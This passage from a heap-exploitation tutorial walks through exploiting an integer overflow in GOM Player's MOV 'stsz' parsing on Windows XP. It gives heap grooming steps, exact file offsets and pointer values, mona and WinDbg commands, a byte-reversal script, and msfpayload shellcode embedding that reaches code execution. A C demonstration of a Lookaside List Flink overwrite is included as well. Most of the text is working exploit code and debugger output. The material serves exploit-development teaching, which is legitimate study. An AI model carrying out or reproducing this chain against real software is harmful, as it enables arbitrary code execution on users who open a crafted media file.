      HEAP_ENTRY      Size  PrevSize    Unused Flags    UserPtr  UserSize Remaining - state
        03207240  000000a8  00000020  0000000c  [01]   03207248  0000009c  00000004   Busy  (hex)
                  00000168  00000032  00000012                   00000156  00000004   Busy  (dec)

      Chunk header size: 0x8 (8)
      Size initial allocation request: 0x9c (156)

Great. Now we see that our data is being written to a 4th and final heap chunk belonging the 0x03200000. It’s important to recall that the initial (requested) allocation size of this block is 0x9c which if course is due to our integer overflow.

Now what’s the point in all this? Why did I have you go through each instruction to identify the heap blocks in question? I promise it wasn’t to fluff out another 1000 words. Let’s summarize the heap chunks that we’ve identified.

Chunk 1 - Address: 03207118   Size: 0x108   Desc: Chunk containing our data to be read
Chunk 2 - Address: 032070C8   Size: 0x50    Desc: Chunk containing p2p of write block
Chunk 3 - Address: 03207220   Size: 0x20    Desc: Chunk containing pointer to our write location.
Chunk 4 - Address: 03207240   Size: 0xa8    Desc: Chunk containing our written data

Now remember, chunk 4 is where our tainted data is being written and therefore, also the location of our overflow. Now the trick here is to overflow our data into something useful. With the current heap state, chunk 4 occurs at a location past all of our previous chunks. If we were somehow able to manipulate the heap so that our chunk would get allocated to a location prior to chunks 2 or 3, we could overwrite the value of ecx. And since we already control edx during our write instruction, controlling ecx would give us the ability to perform an arbitrary write. As we had demonstrated from the last article in this series, an arbitrary 4-byte write can be used to overwrite an application function pointer, therein allowing us to gain control over the instruction pointer.

So our next hurdle is to determine how exactly we can manipulate our 4th chunk in order to have it placed prior to chunks 2 and 3. Well, fortunately for us we can control its requested allocation size.

As we discussed in the heap basics section, free chunks are managed by 2 primary structures (Lookaside Lists and Free Lists). Both structures sort entries on the basis of size. In this case, all we need to do is to identify a free chunk closest to either the base address of Chunk 2 or 3. Once we’ve done so, we can modify the requested size of our 4th chunk in order to match that of our target free block. If everything works as expected, when that chunk is allocated, it’ll get allocated to a location prior to either chunks 2 and 3.

Before we continue however, there’s something that I must address. One of the biggest issues with heap exploitation is having a deterministic heap state. This means that the layout of chunks and various heap structures are predictable. In the case of our GOM vulnerability, we’re dealing with a private heap. The addresses for these heap chunks will likely change. Furthermore, the address of the private heap itself will more than likely change from system to system and even between executions. However, in my testing, the allocations and frees performed on this heap up until the point of our access violation appear to be static. And by that I mean that the same data of the same size is being allocated on each run of the application. With that, our heap will likely be in a deterministic state. Now although the addresses may change, the offset to each chunk will likely remain the same. With this, we are able to reliably trigger our arbitrary overwrite.

Ok, with that said, let’s take a look at what free chunks we have available to us. Still at our 4th breakpoint, let’s execute the following 2 commands:

!py mona heap –h 0320000 –t bea
!py mona heap –h 0320000 –t fea

These two commands will display the contents of the back end (-bea) and front end allocators (-fea) respectively. Rather than posting the full output, I’ve broken it down to the following:

0:000> !py mona heap -h 03200000 -t bea
[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x032072e8, Header: 0x8 bytes, UserPtr: 0x032072f0, Flink: 0x032080d8, Blink: 0x03200178, ChunkSize: 0x4e0 (1248), Usersize: 0x4e0 (1248) 
     ChunkPtr: 0x032080d0, Header: 0x8 bytes, UserPtr: 0x032080d8, Flink: 0x03205dd8, Blink: 0x032072f0, ChunkSize: 0xf30 (3888), Usersize: 0xf30 (3888) 
     ChunkPtr: 0x03205dd0, Header: 0x8 bytes, UserPtr: 0x03205dd8, Flink: 0x03200178, Blink: 0x032080d8, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300) 

0:000> !py mona heap -h 03200000 -t fea
LAL [5] @0x03200778, Expected Chunksize 0x28 (40), Flink : 0x032058a0
LAL [9] @0x03200838, Expected Chunksize 0x48 (72), Flink : 0x03205a58
LAL [11] @0x03200898, Expected Chunksize 0x58 (88), Flink : 0x03207018
LAL [13] @0x032008f8, Expected Chunksize 0x68 (104), Flink : 0x03202448
LAL [15] @0x03200958, Expected Chunksize 0x78 (120), Flink : 0x032022b0

Interesting. Take a look at LAL [11]. Here we can see a free chunk that begins at 0x03207018. That’s only 0xB0 bytes away from the start of chunk 2. If we can place at least that many bytes in our container, we should be able to overwrite the pointer pointed at by @edi-28 at the instruction GSFU!DllUnregisterServer+0x236a3, therefore tainting @ecx.

Ok, so first things first. We need to manipulate the size of our allocation. As the allocation size of our write block is dictated by the value supplied to the “Number of Entries” element within our “stsz” atom, we need to figure out what value to supply in order to have this block allocated to LAL [11]. Now remember, since our integer get’s wrapped, we really only need to worry about the last byte of this element. In our original MutatedSeed.mov, we supplied a value of 0x80000027. This was multiplied by 4 resulting in 0x9C (the same if we were to do 0x27 * 4). So in order to place our allocation within LAL [11] we need to provide a value of 0x50 (the size of LAL [11] – 0x8 bytes for the header) divided by 4, resulting in 0x14. So let’s go ahead and change our value of the “Number of Entries” element to 0x80000014. Save these changes, set the following breakpoint at our first pointer assignment and continue execution. We’ll then step through until we hit our write instruction.

0:000> bp GSFU!DllUnregisterServer+0x236a3
Bp expression 'GSFU!DllUnregisterServer+0x236a3' could not be resolved, adding deferred bp
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=000000ec ecx=000000b5 edx=000094b5 esi=03207134 edi=032070d0
eip=03c34983 esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236a3:
03c34983 8b4f28          mov     ecx,dword ptr [edi+28h] ds:0023:032070f8=03207228
0:000> t
eax=00000000 ebx=000000ec ecx=03207228 edx=000094b5 esi=03207134 edi=032070d0
eip=03c34986 esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236a6:
03c34986 8b4910          mov     ecx,dword ptr [ecx+10h] ds:0023:03207238=03207018
0:000> t
eax=00000000 ebx=000000ec ecx=03207018 edx=000094b5 esi=03207134 edi=032070d0
eip=03c34989 esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236a9:
03c34989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:03207018=00000000

Excellent! We’ve managed to place chunk 4 prior to chunk 1. With our current setup, we’re writing 0xEC bytes to this chunk which is more than enough to overwrite our pointer. To confirm, we can set a hw breakpoint on 0x032070f8 (@edi-28) to trigger whenever a write attempt is made. Also, make sure to clear your other breakpoints.

0:000> bc *
0:000> ba w 4 032070f8
0:000> g
Breakpoint 0 hit
eax=00000038 ebx=0000000c ecx=03207018 edx=00005184 esi=03207214 edi=032070d0
eip=03c3498c esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllUnregisterServer+0x236ac:
03c3498c 8b5728          mov     edx,dword ptr [edi+28h] ds:0023:032070f8=00005184

Excellent once again! Here we’ve managed to overwrite the original pointer value of 0x03207228 to 0x00005184 which is a value contained within our “Sample Size Table”! With that, we now control ecx.

Now for the tricky part. Since ecx is not used directly in our write instruction, we’ll need to find a series of pointers to pointers in order to accomplish our arbitrary write. Since we want to control the value within ecx during the write instruction, we’ll need to work from there backwards in order to determine the actual value to provide within our sample file. Let’s take a look once again at our 4 instructions:

GSFU!DllUnregisterServer+0x23685                 movzx   edx, byte ptr [esi]
GSFU!DllUnregisterServer+0x236a3                 mov     ecx, [edi+28h]
GSFU!DllUnregisterServer+0x236a6                 mov     ecx, [ecx+10h]
GSFU!DllUnregisterServer+0x236a9                 mov     [ecx+eax*4], edx

First, during our write instruction we again notice that ecx is added to the value of eax*4. The resulting number will be the address of our write location. When trying to determine pointers that can be used to overwrite a function pointer, we’ll first need to subtract (eax *4) from these pointer locations.
Next, we’ll need to take these numbers and find a pointer to them with an offset of –0x10.
Finally, to satisfy our last requirement, we’ll need to find a pointer to our previous pointer with an offset of –0x28.

I’m sure that this sounds incredibly complicated however, let’s take it step by step and attempt to identify which function pointers are available to us.

How I Fail:

What’s interesting about our predicament here is that to find these pointers, we must use data present within our application and it’s available libraries (including system libraries). This issue is further complicated by the fact that GOM marks most of it’s modules as rebased which in effect prevents us from using these modules as the addresses will likely change. If this application could be executed via a web browser or provided us with some level of scripting, we could use a precise heap spray such as corelanc0d3r’s DEPS to satisfy our requirements by storing our pointers at a reliable place within memory. However, we don’t have that luxury which forces us to identify the appropriate bytes in our applications modules. And, as I’m sure you know, using OS modules is less than ideal as the addresses within these modules will likely change based on patch and service levels. However, we must make do with what we have.

So with that said, let’s begin first by identifying all writable function pointers that exist in modules not marked as rebased. You can accomplish this by using the following command:

!py mona fwptr –cm rebase=false
# This may take quite a while.

Once this has finished, we next need to subtract 0xE4 from these values. This is the value of eax*4 during our write instruction. Currently, there’s no easy way to do this as the offset and offset level options provided by !mona only apply to p2p (pointer to pointer) results. In lieu of that, I’ve written a small python script that will subtract our offset of 0xE4 from the identified offsets. Remember, we’ll need to manipulate these pointers in reverse in order to have the correct result in our write instruction.

#!/usr/bin/python
from __future__ import print_function
import re

new = open('updated-wptr.txt','w')
with open("wptr.txt") as f:
   content = f.readlines()

for line in content:
    line = line.rstrip()
    ptr1, ptr2 = '',''
    if re.match("^0x", line):
        ptr1 = re.match("^0x[a-f0-9]{8}", line).group(0)
        if ptr1:
            ptr2 = hex(int(ptr1, 16) - int("0xE4", 16))
            line = re.sub(ptr1, ptr2, line)
    print(line, file=new)

new.close()

This will leave the original wptr.txt intact and write our modified data to update-ptr.txt. Once that is complete, we need to take each one of these pointers and find a pointer to them with an offset of negative offset of 0x10. This can be accomplished by the following command:

!py mona find –cm rebase=false –t file –p2p –offset 0x10 –offsetlevel 1 –s updated-wptr.txt
# This will also take an incredibly long time.  The output will be written to find.txt

Once this has completed, we now need to identify which writable function pointers are called after our overwrite occurs. To do this, I used a bit of bash-fu to isolate the writable function pointers that we can control.

grep -Po "(?<=\ at\ )0x[a-f0-9]{8}" find.txt |sort -u |sed 's/^/bp /g;s/$/ "r;gc"/g'

In my case, I identified just over 2500 function pointers that we have the ability to manipulate. Your results may vary depending. Let’s hold on to this data for a moment and look back at our “stsz” block. Earlier when we set our hw breakpoint we saw that the value 0x00005184 was being written to poi(@edi+0x28). This value actually occurs twice within our “stsz” atom. In order to identify exactly what data is being written, let’s go ahead and replace the entire “Sample Size Table” (not the entire atom) with a cyclical pattern. Our “Sample Size Table” is 0xEC (236) bytes in length so let’s generate a pattern of the same size. We can use !mona to accomplish this by executing the following command:

!py mona pc 236

And once again, let’s set a breakpoint on our first pointer assignment. This time, we’ll configure the breakpoint to also apply a write access breakpoint on poi(edi+0x28).

bp GSFU!DllUnregisterServer+0x236a3 /1 "ba w 4 (edi+28);gc"
...truncated...

eax=00000038 ebx=0000000c ecx=03207018 edx=34416835 esi=03207214 edi=032070d0
eip=03c3498c esp=0012bdb4 ebp=03207120 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllUnregisterServer+0x236ac:
03c3498c 8b5728          mov     edx,dword ptr [edi+28h] ds:0023:032070f8=34416835

Great. Now using !mona we can find the offset.

0:000> !py mona po 34416835
Hold on...
Looking for 5hA4 in pattern of 500000 bytes
Looking for 4Ah5 in pattern of 500000 bytes
 - Pattern 4Ah5 (0x34416835 reversed) found in cyclic pattern at position 224

Ok. Moving right along. So offset 224 (0xE4) contains the value that will be used to overwrite our pointer located at poi(edi+0x28). Let’s go ahead and change this to any writable function pointer just so that we don’t trigger a read or write access violation. I randomly selected 0x7760ca30, a pointer to a pointer that will eventually point to a writable region within ole32.dll***. Let’s save the file and again set a breakpoint on our first pointer assignment so that it triggers whenever the pointer has been overwritten.

0x7760ca30 : ptr-16(-10h) to 0x7760ca40 (-> ptr to 0x7760ca40 gets called from ole32.dll at 0x775e4454 (CALL DWORD PTR DS) ** | {PAGE_READWRITE} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6168 (C:\WINDOWS\system32\ole32.dll)

bp GSFU!DllUnregisterServer+0x236a3 /1 "ba w 4 (edi+28);gc"
...truncated...

eax=00000038 ebx=0000000c ecx=03227018 edx=7e4711f8 esi=03227214 edi=032270d0
eip=03c3498c esp=0012bdb4 ebp=03227120 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236ac:
03c3498c 8b5728          mov     edx,dword ptr [edi+28h] ds:0023:032270f8=7e4711f8

Excellent. Now, let’s clear our breakpoints and this time, apply all 2500+ breakpoints from bash-fu output.

Upon execution, you’ll see a number of breakpoints get hit. Out of my 2500 breakpoints, 20 were hit prior to triggering an access violation at GSFU!DllUnregisterServer+0x236af. Of the 20 possible function pointers that we can use, I’ve chosen to go with the following. I’ll explain exactly why in just a bit.

0x7e419dc2 : ptr-16(-10h) to 0x7e4712ec (-> ptr to  0x7e4712ec gets called from USER32.dll at 0x7e46c6f3 (CALL DWORD PTR DS) **  |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)

So with this, let’s set out pointer to 0x7e419dc2 (this should be at file offset 0x1403). Save your changes and let’s observe what happens in the debugger.

(b58.dc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008a0650 ebx=0018033a ecx=035bfe24 edx=00000002 esi=00000002 edi=00a22f78
eip=41683641 esp=035bfddc ebp=035bfdfc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41683641 ??              ???

Excellent! So here we’ve managed to overwrite the function pointer with the value adjacent to our pointer in MutatedSeed.mov (0x41683641). The reason for this is obvious of course as our vulnerable function writes in 4 byte increments. So during one iteration our pointer will be used to set our base write address (from this point forward) to 0x7e4713d0. On our next iteration, our data from our cyclical pattern, Ah6A (0x41683641), will be used to overwrite our function pointer.

Now that we’ve gained control over the instruction pointer, we still need to find a way to execute shellcode. At this point, we would typically look for a pointer on the stack that will lead us back to a location in memory that we control. However, as you can see when the function pointer is called, esp is set to 0x035bfddc which is very far away from our stack used during our write function (stack beginning at 0x00127000). Now we could look for a way to pivot our stack pointer back to a location we control however it is unlikely that we will be successful. Typically stack pivots allow you to shift the stack pointer up rather than down. Because of this, the gadgets available to us will be limited.

However, there is actually a significantly easier method available to us in order to gain code execution. Think back to our vulnerable function. Its job is to read the contents of the sample size table and write it to a location defined within memory. In the example above, we manipulated ecx used during our write instruction to point to a writeable location in memory allowing us to overwrite a function pointer. However, what would happen if we were to provide additional data to be written other than our new function pointer address? The behavior of the function would not change. We would overwrite the function pointer, and then continue to write the contents of our sample size table adjacent to this function pointer. As we’re already using the static address of the function pointer, we can just as easily use this region in order to store our shellcode.

Looking back at our file however, we can see that after overwriting our function pointer with 0x41683641, we’re only writing another 4 bytes. This means that we’ll have to expand our sample size table in order to accommodate our shellcode. For the purposes of this document, I’ll only be using a simple windows/exec payload and of course, popping calc. This means that we will need an additional 200 bytes (0xC8) in our sample size table. To accommodate this, let’s go ahead and modify the size element of the ‘stsz’ atom from 0x00000100 to 0x00000200 (file offset 0x130F). This will give us an additional 0x100 bytes of space. Now let’s also go ahead and insert an additional 0x100 bytes beginning at file offset 0x140F. For simplicity sake, let’s insert 0x100 bytes of NOPs (0x90).

Next, we’ll need to set the value used to overwrite our function pointer to the location of our function pointer +0x4. This location will contain the start of our shellcode. As our function pointer calls the DWORD PTR located at 0x7e4713d0, let’s replace the 4 bytes located at file offset 0x1407 with 0x7e4713d4.

Next, let’s generate our shellcode using the following syntax.

msfpayload windows/exec CMD="calc.exe" R > foo.raw

With our pointer set and shellcode created, you’d probably assume that we would just paste out shellcode and be good to go. However, there’s one last hurdle we need to overcome. Remember back to when we were dissecting our function? Our data is first read in 4 byte chunks. The byte order of each 4 byte chunk is then reversed and written to our intended location. As such, we can’t simply paste our shellcode as it will be written improperly. In order to work around this issue, I used the following short python code in order to reverse the byte order of each 4 byte chunk. The results of which are written to foo.fixed.raw.

#!/usr/bin/python

out = []
with open("foo.raw", "r") as f:
  byte = f.read(4)
  while byte != "":
    out.append(byte[::-1])
    byte = f.read(4)

with open("foo.fixed.raw", "w") as f:
  for x in out:
    f.write(x)

With our shellcode fixed, let’s go ahead and paste it into our file beginning at file offset 0x140B. Finally. save the changes and let’s observe the results in our debugger.

And with a bit of luck, calc.exe should be launched in turn demonstrating full exploitation of our issue. A copy of the proof of concept used to trigger this bug can be downloaded here.

Thoughts on This Attack

Before we continue, I’d like to cover a few thoughts I had during the exploitation process.

First, using this attack vector we chose to target the pointer located at [edi+0x28]. In doing so, we had to identify function pointers which met 2 sets of criteria. First, we needed a pointer where we could subtract the offset 0xE4 (due to our pointer used by (ecx+eax*4)). Then, we needed to identify pointers to these pointers which could account for an offset of 0x10 (due to mov ecx, [ecx+0x10]). As each pointer was contained within their own respective heap chunks, wouldn’t it have been easier to target the pointer pointed to by [ecx+0x10]? The answer to this is, well, “maybe”. Getting our tainted data to overwrite the pointer located at [ecx-10] would be as simple as it was to overwrite the pointer located at [edi+0x28]. We would simply need to change our allocation size in order to place it prior to this chunk, then write enough data to overwrite the pointer. Doing so would provide us to a significantly greater range of writable function pointers. Many of which would provide us with a register state that would allow us to pivot the stack pointer back to our shellcode. However, the problem with this method is that due to the heap layout, we would also overwrite several other heap chunks in the process. Doing so would mean that we would have to contend with serious heap corruption, most of which we may not be able to correct – at least not reliably. As each element within the application is essentially allocated into it’s own heap chunk, we can manipulate the file structure in order to control, at least to some extent, the heap layout. However, during my testing I was unable to create a heap layout which allowed me to overwrite the pointer located at [ecx+0x10] without corrupting other heap blocks in the process. Because of this, the method of tainting the pointer located at [edi+0x28] was chosen.

Next, out of the 20 or so function pointers that were called between the time our heap corruption occurred and an access violation was triggered, only one was chosen. Why did I choose the pointer that I did? Well, if you recall, we manipulated the write instruction to overwrite our target function pointer and then continue writing beyond it in order to place our shellcode. If you were to look at most of these regions which contain writable function pointers, you may notice that several function pointers are stored adjacent to one another. That means that if we were to overwrite a function pointer and continue writing beyond it, we could inadvertently overwrite an adjacent function pointer. Doing so may make it difficult to reliably control the flow of execution as other, “accidentally” overwritten function pointers may get called prior to our intended target. However, this also opens up new possibilities. In the paragraph above, I mentioned that the goal would be to overwrite a function pointer that would provide us with a register where we could use a ROP gadget in order to pivot back to our shellcode. Well, using this type of attack, we now know that we don’t need to be precise in overwriting a specific function pointer. We could find pointers that would satisfy our 2 conditions described above in order to land in the general region of our chosen function pointer. Then, we could continue writing until the function pointer is overwritten. Again, this method is a bit more difficult, a bit less reliable, and a bit more confusing than I wanted to document for the purpose of this article.

And finally, I’d just like to reiterate the fact that targeting these types of heap corruption issues in applications which don’t provide us with some method of spraying the heap can be extremely difficult to exploit. In this case, we were incredibly lucky in the fact that the heap state was very deterministic. I have seen far more times than I’d like to count where the type and number of allocations varied greatly between application runs. This makes determining locations and offsets within the heap nearly impossible without having a great deal of control over further allocations and frees against our targeted heap.

Generic Exploitation Methods

In this section, I’d like to briefly discuss 3 popular methods for circumventing the security protections implemented into the XP SP2 heap manager, how they apply to our application specific overflow, and why I chose not to use these methods for exploitation. I will not be going into great depth with these methods, therefore some details may be omitted for brevity. Functional use of these exploitation methods will be left up to you to complete.

Lookaside List Overwrite

Overview

As we had discussed earlier, the advent of XP SP2 saw the addition of safe-unlinking. This check would ensure that a chunk residing on the Freelist would have it’s Flink and Blink pointers validated prior to unlinking. If this check failed, the chunk would be reported as corrupt and discarded. Therefore, successfully preventing you from performing an arbitrary 4-byte write.

What Microsoft didn’t consider at the time was that the Lookaside Lists, which are organized into singly-linked lists, could also be abused during the unlink process in order to gain the ability to perform arbitrary writes. And, as this is a singly-linked list, the safe-unlink check does not apply.

This technique was first described in October of 2004 by Alexander Anisimov. A link to his paper can be found here.

To better explain, let’s take a look at the following code:

Quick note – In order to properly debug this, you’ll need to patch debugging functions using the following command:

!py mona hidedebug

#include <stdio.h>
#include <windows.h>

int main( void )
{
    void *a,*b,*c,*d;
    void *hHeap;

    hHeap = HeapCreate(0x00040000,0,0);
    printf ("hHeap == 0x%p\n", hHeap);

    a = HeapAlloc(hHeap,0x00000008,8);
    b = HeapAlloc(hHeap,0x00000008,8);
    printf ("Allocated:\n  a == 0x%p\n  b == 0x%p\n", a, b);

    HeapFree(hHeap, 0, b);

    char str1[] = { 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x02, 0x00, 0x02, 0x00, 0x7e, 0x01, 0x08, 0x00, 0x42, 0x42, 0x42, 0x42 };

    // memcpy writes beyond the bounds of "a" into the heap header of "b"
    memcpy ( a, str1, sizeof(str1));

    // Pop valid chunk from the list
    c = HeapAlloc(hHeap,0x00000008,8);

    // Return arbitrary pointer
    d = HeapAlloc(hHeap,0x00000008,8);

    printf ("Allocated:\n  c == 0x%p\n  d == 0x%p\n", c, d);
}

In this example, we begin by creating a new heap and allocating 2 chunks from it, (“a” and “b”) with a size of 0x8 bytes. Next, “b” will be freed back to the heap. As this chunk is less than 1024 bytes, it will be freed to LAL[2] (since it has a user size of 0x8 bytes). This will leave our LAL structure as follows:

LAL [2] @0x005406e8, Expected Chunksize 0x10 (16), Flink : 0x00541ea0
     ChunkPtr: 0x00541e98, UserPtr: 0x00541ea0, Flink: 0x00000000, ChunkSize: 0x10, UserSize: 0x8, Userspace: 0x8 (Busy)

Please note that the Flink of our LAL list head points to our first chunk located at 0x00541EB0 and that the Flink of our chunk, as it is the last and only one, is currently set to 0x00000000.

Next, our code issues a call to memcpy in order to copy a string of hex values from str1 to allocation “b”.

A quick note on the data being copied here. The first 8 bytes contain only 0x41. This is used to fill our allocated buffer size. The remaining 12 bytes will then be used to overflow the bounds of our allocated buffer and overwrite our LAL chunk header. The last 4 bytes, 0x42424242, are the most important as they will be used to overwrite the Flink of our freed chunk (“b”).

After our call to memcpy, our LAL structure will look as follows:

LAL [2] @0x005406e8, Expected Chunksize 0x10 (16), Flink : 0x00541ea0
     ChunkPtr: 0x00541e98, UserPtr: 0x00541ea0, Flink: 0x42424242, ChunkSize: 0x10, UserSize: 0x8, Userspace: 0x8 (Busy) 
     ChunkPtr: 0x4242423a, UserPtr: 0x42424242, Flink: 0x00000000, ChunkSize: 0x0, UserSize: 0x0, Userspace: 0x8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **

Excellent! Here we can see that we’ve successfully overwritten the Flink of our LAL entry with the value 0x42424242. Looking ahead in our code, we can see that we have another allocation request of 0x08 bytes (“c”). This request will return the LAL chunk located at 0x00541EB0 (UserPtr). The result of which, will leave our LAL structure looking as follows:

LAL [2] @0x005406e8, Expected Chunksize 0x10 (16), Flink : 0x42424242
     ChunkPtr: 0x4242423a, UserPtr: 0x42424242, Flink: 0x00000000, ChunkSize: 0x0, UserSize: 0x0, Userspace: 0x-8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **

And with this we can see that our next available chunk is located at 0x42424242. Clearly, a valid heap chunk does not exist at this location. However, as long as 0x42424242 is a readable (and preferably writable) address, which it currently is not, our final call to HeapAlloc will return a pointer to 0x42424242. This means that if we can control the data being written during our final allocation, we can perform an arbitrary write of up to 0x8 bytes (as this is the maximum size of our LAL entry)***.

Targeting other Lookaside Lists will likely provide you with the ability to overwrite a significantly greater amount of data. For example, LAL[127] may allow you to write up to 1016 bytes!

Application Specific Technique

The first hurdle that we must overcome when applying this type of attack is to determine if we can in fact overwrite the Flink of a Lookaside List entry. To do so, let’s set a breakpoint at the start of our function and using !mona, determine what free chunks are available to us:

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x03207148, Header: 0x8 bytes, UserPtr: 0x03207150, Flink: 0x03208108, Blink: 0x03200178, ChunkSize: 0x6b0 (1712), Usersize: 0x6b0 (1712) 
     ChunkPtr: 0x03208100, Header: 0x8 bytes, UserPtr: 0x03208108, Flink: 0x03205e08, Blink: 0x03207150, ChunkSize: 0xf00 (3840), Usersize: 0xf00 (3840) 
     ChunkPtr: 0x03205e00, Header: 0x8 bytes, UserPtr: 0x03205e08, Flink: 0x03200178, Blink: 0x03208108, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300) 

LAL [15] @0x03200958, Expected Chunksize 0x78 (120), Flink : 0x03202400
     ChunkPtr: 0x032023f8, UserPtr: 0x03202400, Flink: 0x00000000, ChunkSize: 0x78, UserSize: 0x6c, Userspace: 0x70 (Busy) 
LAL [9] @0x03200838, Expected Chunksize 0x48 (72), Flink : 0x03205ab8
     ChunkPtr: 0x03205ab0, UserPtr: 0x03205ab8, Flink: 0x00000000, ChunkSize: 0x48, UserSize: 0x39, Userspace: 0x40 (Busy)
LAL [11] @0x03200898, Expected Chunksize 0x58 (88), Flink : 0x03207048
     ChunkPtr: 0x03207040, UserPtr: 0x03207048, Flink: 0x00000000, ChunkSize: 0x58, UserSize: 0x4c, Userspace: 0x50 (Busy) 
LAL [5] @0x03200778, Expected Chunksize 0x28 (40), Flink : 0x03205a08
     ChunkPtr: 0x03205a00, UserPtr: 0x03205a08, Flink: 0x00000000, ChunkSize: 0x28, UserSize: 0x1c, Userspace: 0x20 (Busy)
LAL [13] @0x032008f8, Expected Chunksize 0x68 (104), Flink : 0x03205788
     ChunkPtr: 0x03205780, UserPtr: 0x03205788, Flink: 0x00000000, ChunkSize: 0x68, UserSize: 0x5c, Userspace: 0x60 (Busy)

Good. Here we can see that LAL[5] and LAL[9] are (nearly)* adjacent to each other. If we can trigger our writes to occur within LAL[15], after writing 0xB4 bytes we can successfully overwrite the Flink of LAL[9].

Two small allocated heap chunks exist between LAL[5] and [9]. This information can be found by using the following command:

!py mon heap –h 03200000 –t all

To do so, we’ll need to set our “Number of Entries” to 0x80000008. This will trigger an allocation size of 0x20 (0x8 * 4) bytes, leaving 8 bytes for the addition of the LAL header and ensuring that our allocation uses the pointer specified by LAL[5]. Next, to ensure that we write enough data to overwrite the Flink of LAL[9], we’ll need to set the size element of our “stsz” atom to 0xC8 and pad the atom to meet this value. This will cause our vulnerable function to write the contents of our “sample size table”, which is 0xA8 bytes to be exact.

Furthermore, for demonstration purposes I’ve also gone ahead and replaced the contents of the “Sample Size Table” with the repeating value “0x41,” and specifically changed the last 4 bytes to 0x78787878 (“xxxx”). These final 4 bytes will be used to overwrite the Flink of LAL[9]. This will leave our sample with the following structure:

Size:  0x000000C8 (Triggers a write of 0xA8 bytes)
Type:  0x7374737A (ASCII stsz) 
Version:  0x00 
Flags:  0x000000 
Sample Size: 0x00000000
Number of Entries: 0x80000001C (Triggers an allocation of 0x70 bytes)
Sample Size Table(1):  0x41414141 ("AAAA")
Sample Size Table(2):  0x41414141 ("AAAA")
...
Final 4 Bytes: 0x78787878 ("xxxx")

If you’re having difficulty understanding the changes that we’re making within the file format, don’t worry. I’ve included a full proof of concept at the end of this section which implements the structure discussed here.

Saving these changes and observing in our debugger, we can see that our writes are in fact occurring in the correct chunk:

LAL [5] @0x03200778, Expected Chunksize 0x28 (40), Flink : 0x03205a08, ChunkPtr: 0x03205a00, UserPtr: 0x03205a08, Flink: 0x00000000, ChunkSize: 0x28, UserSize: 0x1c, Userspace: 0x20 (Busy)

eax=00000000 ebx=000000b4 ecx=03205a08 edx=41414141 esi=03207164 edi=03207100
eip=03b34989 esp=0012bdb4 ebp=03207150 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllUnregisterServer+0x236a9:
03b34989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:03205a08=00000000

And if we were to set a write access breakpoint on the UserPtr of LAL[5], we can see that the Flink is overwritten with our chosen value of 0x78787878 (“xxxx”).

eax=0000002c ebx=00000004 ecx=03205a08 edx=78787878 esi=03207214 edi=03207100
eip=03b34989 esp=0012bdb4 ebp=03207150 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllUnregisterServer+0x236a9:
03b34989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:03205ab8=00000000

LAL [9] @0x03200838, Expected Chunksize 0x48 (72), Flink : 0x03205ab8
  2 chunks:
     ChunkPtr: 0x03205ab0, UserPtr: 0x03205ab8, Flink: 0x78787878, ChunkSize: 0x20a08, UserSize: 0x209c7, Userspace: 0x20a00 (FFU-2,Busy) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x78787870, UserPtr: 0x78787878, Flink: 0x00000000, ChunkSize: 0x0, UserSize: 0x0, Userspace: 0x-8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **

Excellent. So now that we’ve overwritten the Flink of a Lookaside List entry, we’ll next need to trigger two allocations of that particular size. In this case, we’ll need to control two allocations of 0x40 bytes (and 0x8 bytes are used for the LAL entry header, bringing the total consumed space for each allocation to 0x48). The first allocation will return the pointer, 0x03205AB8 as specified by the first LAL entry header. The second allocation will return a pointer to whatever value we’ve specified as our Flink (as long as this value points to a location that is both readable and writable).

Now to help us determine which allocations we can control, we’ll set the following 2 breakpoints which will output the size and locations of both allocations and frees which belong to the private heap located at 0x03200000. Please note that we need to apply these breakpoints after the Flink of our targeted LAL entry has been overwritten.

bp ntdll!RtlAllocateHeap+0x117 "j (poi(@esp+4)==0x03200000) '.printf \"RtlAllocateHeap hHEAP 0x%p, size=0x%x, chunk at 0x%p\\n\", poi(@esp+4), poi(esp+c), eax; g'; 'g';"
